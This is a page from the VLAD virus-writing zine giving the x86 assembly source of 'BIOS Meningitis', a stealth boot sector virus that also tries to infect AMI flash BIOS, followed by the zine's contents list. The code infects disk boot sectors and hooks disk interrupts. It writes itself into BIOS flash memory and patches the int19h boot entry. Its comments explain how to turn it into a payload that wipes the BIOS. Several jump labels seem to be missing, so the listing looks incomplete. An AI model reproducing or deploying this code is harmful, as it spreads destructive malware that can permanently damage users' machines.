Virus Labs & Distribution
VLAD #2 - BIOS Meningitis Source

;                    -=[ BIOS Meningitis ]=-
;                                               Qark/VLAD
;  Basic boot sector virus with a twist.
;  The worlds first flash BIOS infecting virus!
;  I _just_ fit all this into 512 bytes.  Infact there is only four bytes
;  spare... there wasn't even enough room for the name!  It used to copy
;  the partition table to the end of the virus but that is 64 bytes that 
;  just couldn't spared, so now you if you boot from a floppy disk, the 
;  hard disk won't be accessible.  But it's a full stealth virus apart
;  from that.
;  If you have flash BIOS on your computer there is a chance it will fuck 
;  it up!  I'm talking wiped BIOS chip type fucked!  You WONT be able to
;  remove this virus!!!
;  The results of any tests of this with flash BIOS would be appreciated.
;  Assemble with A86 as always.

;On entry to the boot sector DL=Drive booted from.

	org     0        
	mov     si,7c00h
	xor     ax,ax
	mov     es,ax

	mov     ss,ax                   ;Setup the stack
	mov     sp,si

	mov     ds,ax                   ;DS,CS,ES,SS=0

;***    40:[13] -       memory in k's   -  reduce by one or so          ***

	dec     word ptr [413h]         ;0:413 = Memory in K,  Sub one K.
	int     12h                     ;Get memory into AX
					;Since memory is in K we have to
					;multiply by 1024.  To do that we 
					;would SHL AX,10.  But because we are
					;looking for the segment that takes
					;4 bits off the equation.

	mov     cl,6
	shl     ax,cl                   ;Thus SHL AX,6
	mov     es,ax                   ;ES = Virus Segment

;***    read virus sector into TOM  (top of memory)     ***

	xor     di,di
	mov     cx,200h
	rep     movsb                   ;Move virus to ES:0

	mov     ax,word ptr [13h*4]     ;Get int13h from vector table.
	mov     word ptr es:[offset i13],ax
	mov     ax,word ptr [13h*4+2]
	mov     word ptr es:[offset i13+2],ax

	mov     word ptr [13h*4],offset handler
	mov     word ptr [13h*4+2],es


	push    es
	mov     ax,offset restart
	push    ax

	;Load the original bootsector from the end of the root directory and
	;execute it.
	xor     ax,ax
	call    int13h

	xor     ax,ax
	mov     es,ax
	mov     bx,7c00h                ;Where it's meant to be.

	mov     cx,2                    ;Read HD boot strap from MBR.
	xor     dh,dh
	mov     ax,201h                 ;Read one sector from root directory.
	cmp     dl,80h
	jae     MBR_Loader
	;load up floppy
	mov     cl,14                   ;Cylinder=0, Sector=14
	mov     dh,1                    ;Head=1

	call    int13h

	push    dx                      ;DL=Drive we are at.

	cmp     byte ptr cs:flash_done,1   ;flash is already infected.
	je      flash_resident

	call    flash_BIOS              ;Infect flash BIOS if any.


	pop     dx

	db      0eah                    ;JMPF   0000:7C00H
	dw      7c00h
	dw      0

	mov     cx,2
	mov     ax,201h
	cmp     dl,80h
	jae     hd_stealth
	mov     cl,14
	mov     dh,1
	call    int13h
	jmp     pop_exit
	xchg    ah,al
	cmp     ax,0abbah
	je      res_test
	cmp     ah,2            ;Reading the first sector ?
	jne     jend
	cmp     cx,1
	jne     jend
	cmp     dh,0
	jne     jend


	call    int13h
	jc      jend

	push    ax
	push    bx
	push    cx
	push    dx
	push    si
	push    di
	push    es
	push    ds
	;Test if already infected.

	cmp     word ptr es:[bx + offset marker],'LV'
	je      stealth                 ;Already infected.

	cmp     dl,80h                  ;C:
	jb      infect_floppy
	mov     cx,2                    ;Sector 2 - Empty MBR space.
	xor     dh,dh
	jmp     write_virus
	;Store at end of root directory for floppy drives.
	;(Will fuck up on 360k but I dont give a shit!)

	mov     cx,14                   ;Cylinder=0, Sector=14
	mov     dh,1                    ;Head=1

	;Write original boot sector to spare room.

	mov     ax,301h
	call    int13h
	jc      pop_exit

	;The virus is written at this point.
	push    cs
	pop     es
	mov     byte ptr cs:flash_done,0

	xor     bx,bx
	mov     ax,301h                 ;Write virus.
	mov     cx,1
	xor     dh,dh
	call    int13h

	pop     ds
	pop     es
	pop     di
	pop     si
	pop     dx
	pop     cx
	pop     bx
	pop     ax

	retf    2

	db      0eah                    ;Stands for Jmpf
	i13     dd      0               ;The original int13h

Int13h  proc    near

	call    dword ptr cs:[i13]

Int13h  endp
Marker  db   'VLAD'                     ;Running out of room so small

Flash_BIOS      Proc    Near

;               Flash BIOS infection (c) 1994 Qark/VLAD!

;Disclaimer: If any of this wrecks your computer that's your bad luck
;because you know this is dangerous code.

;I just hope that AMIFLASH is loaded at boot and isn't a driver.  Since it's
;written by a BIOS maker you'd think so...

	mov     ax,0e000h               ;Get flash BIOS number.
	int     16h                     ;Test for its presence.
	jc      no_flash_bios
	cmp     al,0fah                 ;<-- gotta test this
	jne     no_flash_bios

	;We are now working with AMIFLASH!

	;First we'll find a nice place to store our virus.
	; We'll scan between F000-FFFF where BIOS is normally stored for
	; a 1K chunk of consecutive zeros.  (We might only need half a K
	; but I'm overplanning)

	mov     ax,0f000h               ;ROM BIOS segment
	mov     ds,ax


	xor     si,si
	xor     dx,dx


	inc     ax
	mov     ds,ax
	cmp     ax,0fff0h               ;No room for our virus.
	je      no_flash_BIOS
	cmp     word ptr [si],0         ;Scan words
	jne     new_segment
	inc     dx                      ;DX is our free room counter.
	cmp     dx,512                  ;1024 byte buffer found (512x2)
	je      found_storage

	inc     si
	inc     si                      ;Coz we are messing with words.

	cmp     si,16                   ;We are going up in paragraphs.
	je      ok_new_segment
	jmp     test16

	sub     ax,40h                  ;Sub 1K (40hx16=1024)
	mov     ds,ax                   ;Coz we are using segments

	mov     ax,0e001h               ;Chipset save requirement.
	int     16h
	;BX=Number of bytes to Save Chipset.

	cmp     bx,512
	jbe     save_chipset

	;We won't bother saving the chipset because it takes up more room
	;than our virus buffer can store.  Fuck em :)

	mov     byte ptr cs:chipset,1   ;Indicate we haven't saved anything.
	jmp     write_enable
	mov     byte ptr cs:chipset,0   ;We've saved stuff.

	mov     al,2
	push    cs
	pop     es                      ;ES=CS
	mov     di,offset buffer
	int     16h                     ;Chipset Status to ES:DI


	mov     al,5
	int     16h                     ;Raise Voltage (this may take time).

	mov     al,7                    ;Flash Write Enable.
	int     16h

	;Flash Memory is now writable.  I am working on nothing here
	;so I'll assume you just write to it normally and it'll be
	;put there.   If you were into writing destructive payloads
	;this would be the mother of them all.  Just load CX with 0ffffh
	;to trash their computer.  Also, leaving the computer in this
	;state for extended periods could cause damage (Dunno ? Their
	;electricity bill would go up at least :)

	push    ds
	pop     es                      ;DS=ES=Place to put virus.

	xor     di,di
	mov     cx,512                  ;<-- FFFF = trouble!
	push    cs
	pop     ds                      ;DS=CS
	xor     si,si
	rep     movsb                   ;Move our virus into BIOS.
	;Hopefully our virus is written ?

	;Ok, I looked into this carefully.  At bootup int19h points 
	;into the BIOS but thereafter is grabbed by various programs
	;(Dunno why, its the shittiest interrupt out).  So, if you debug
	;right now it'll point into some shadowed area or else into 
	;segment 70h, but it won't at bootup which is the only time boot
	;sector viruses get executed so all is cool.

	;What we'll do is modify the actual bytes at the entry point to
	;the interrupt.  You might think I should do something else but
	;I can't think of any other way of hooking an interrupt at bootup.

	;Priest-P/S reckoned I should just store my virus in the Flash
	;and let the bootvirus just jump to it or something but then
	;it's not really infected methinks.  He also suggested I just modify
	;the int13h entry point and restore the bytes etc.  Well as you can
	;see from the involved code needed just to write to flash I think
	;that with a common interrupt like int13h it isn't feasible.
	;Get Segment:Offset of original int19handler

	mov     bx,es                   ;BX=Virus Segment
	xor     ax,ax
	mov     ds,ax                   ;DS=Vector Table.
	mov     di,word ptr [19h*4]     ;Offset of int19h
	mov     es,word ptr [19h*4+2]   ;Segment of 19h

	;Write a JMP FAR at the int19h entry point.
	mov     al,0eah
	mov     ax,offset int19handler
	mov     ax,bx
	stosw                           ;Creates a JMPF INT19HANDLER at the
					;int19h entry point.

	mov     ax,0e004h               ;Lower Voltage.
	int     16h

	mov     al,6                    ;Write Protect.
	int     16h

	cmp     byte ptr cs:chipset,0
	jne     No_Flash_BIOS           ;We've done for this one.

	push    cs
	pop     es                      ;ES=CS

	mov     al,3
	mov     di,offset buffer        ;Restore all their shit.
	int     16h
	jmp     no_flash_bios

chipset         db      0       ;1=chipset not saved
flash_done      db      0       ;1=loaded from flash.

;This is our own int19h handler.  The original sux because it isn't infected.
;(Strange logic :)        
Int19Handler    Proc    Near
	xor     ax,ax
	mov     es,ax           ;ES=0

	mov     ax,0abbah       ;ABBA - from Muriels Wedding.
	int     13h

	cmp     ax,0baabh       ;BAAB - I like these.
	jne     real_int19h

;We are currently before the boot here.  Lets install our virus before
;any boot sectors or anything get loaded.

	push    cs              ;DS=0
	pop     ds
	xor     si,si
	mov     di,7c00h
	mov     cx,512
	rep     movsb           ;Move our virus from BIOS into boot buffer.
	mov     dl,80h          ;Make it think its C:
	jmp     goto_Buffer     ;Execute it.

	xor     ax,ax
	int     13h             ;Reset disk

	mov     cx,1
	mov     dh,0
	mov     ax,201h
	mov     bx,7c00h
	cmp     dl,0
	ja      hd_int19h
	int     13h             ;Read boot sector.
	jc      fix_hd

	mov     byte ptr es:[7c00h+offset flash_done],1

	db      0eah            ;JMPF 0000:7C00
	dw      7c00h
	dw      0
	mov     dl,80h          ;Boot from C:
	xor     ax,ax
	int     13h             ;Reset controller.
	mov     ax,201h
	int     13h
	jc      fucked_boot
	jmp     Goto_Buffer

	int     18h             ;Called when a boot fucks up

Int19Handler    EndP

Flash_BIOS      EndP

	DupSize equ     510 - offset End_Virus
	db      DupSize dup (0)
	db      55h,0aah                        ;End of Sector Marker.

Buffer:                         ;512 bytes of storage space in here.



ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag


The Press
ARTICLE.2_2       Leprechaun Interview
ARTICLE.2_3       Flash Bios
ARTICLE.2_4       AMI Flash Specification
ARTICLE.2_5       Assembly Guide
ARTICLE.2_6       Virus Law
ARTICLE.2_7       Feedback


ARTICLE.3_2       TSR Tutorial
ARTICLE.3_5       Kennedy Disasm
ARTICLE.3_6       Darth Vader Strain B Disasm
ARTICLE.3_7       Gergana.222 Disasm


Virus Descriptions
ARTICLE.4_2       VLAD Virus Source
ARTICLE.4_3       Republic Source
ARTICLE.4_4       BIOS Meningitis Source
ARTICLE.4_5       Prodigy 3 Source
ARTICLE.4_6       Estonia Source
ARTICLE.4_7       What's Next


About Debug Scripts
ARTICLE.5_2       VLAD Script
ARTICLE.5_3       Republic Script
ARTICLE.5_4       BIOS Meningitis Dropper Script
ARTICLE.5_5       Prodigy 3 Script
ARTICLE.5_6       Estonia Script
ARTICLE.5_7       The End

About VLAD - Links - Contact Us - Main